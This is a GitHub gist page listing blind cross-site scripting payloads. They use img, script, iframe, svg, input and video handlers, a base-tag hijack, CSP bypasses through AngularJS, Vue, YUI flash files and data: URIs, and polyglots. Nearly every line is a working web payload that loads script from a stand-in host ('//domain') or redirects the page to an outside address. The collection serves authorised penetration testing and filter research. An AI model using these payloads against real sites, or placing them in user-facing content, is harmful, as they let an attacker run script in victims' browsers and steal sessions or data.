-
-
Save LewisArdern/e1b09e85345ecd78713b16042ea6ded6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Image for HTTP Interaction --> | |
"><img src='//domain/xss'> | |
<!-- External JavaScript --> | |
"><script src="//domain/xss.js"></script> | |
// JavaScript URI | |
javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)'); | |
<!-- JavaScript URI in a href --> | |
"><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a> | |
<!-- html5sec - Self-executing focus event via autofocus: --> | |
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus> | |
<!-- html5sec - JavaScript execution via iframe and onload --> | |
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')"> | |
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. --> | |
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg> | |
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags --> | |
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')"> | |
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. --> | |
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')"> | |
<!-- xsshunter.com - Sites that use JQuery --> | |
<script>$.getScript("//domain")</script> | |
<!-- xsshunter.com - When <script> is filtered --> | |
"><img src=x id=payload== onerror=eval(atob(this.id))> | |
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus --> | |
"><input onfocus=eval(atob(this.id)) id=payload== autofocus> | |
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script> | |
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script> | |
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... --> | |
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div> | |
<!-- will change https://example.com/scripts/foo.js to https://domain/scripts/foo.js --> | |
"><base href="//domain"> | |
<!-- object-src is relaxed or missing adapted from https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22 --> | |
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch (e) { d = document; d.location.hash.match(`x1`) ? `` : d.location=`//localhost/mH`}//' allowscriptaccess=always> | |
"><object data='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch (e) { d = document; d.location.hash.match(`x1`) ? `` : d.location=`//localhost/mH`}//' allowscriptaccess=always> | |
<!-- data scheme or wildcard in script-src --> | |
"><script src=data:text/javascript;base64,ZD1kb2N1bWVudDsgXyA9IGQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7Xy5pZD0nMTknO18ubm9uY2U9ZC5xdWVyeVNlbGVjdG9yKCdbbm9uY2VdJykubm9uY2U7Xy5zcmM9Jy8vbG9jYWxob3N0L20nO2QuYm9keS5hcHBlbmRDaGlsZChfKSA=></script> | |
<!-- https:// in script-src --> | |
"><script src='https://domain'></script> | |
<!-- Google Research - AngularJS --> | |
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div> | |
<!-- Google Research - Vue.js--> | |
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div> | |
// Gareth Heyes - https://twitter.com/garethheyes | |
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'> | |
// clrf - http://polyglot.innerht.ml/ | |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment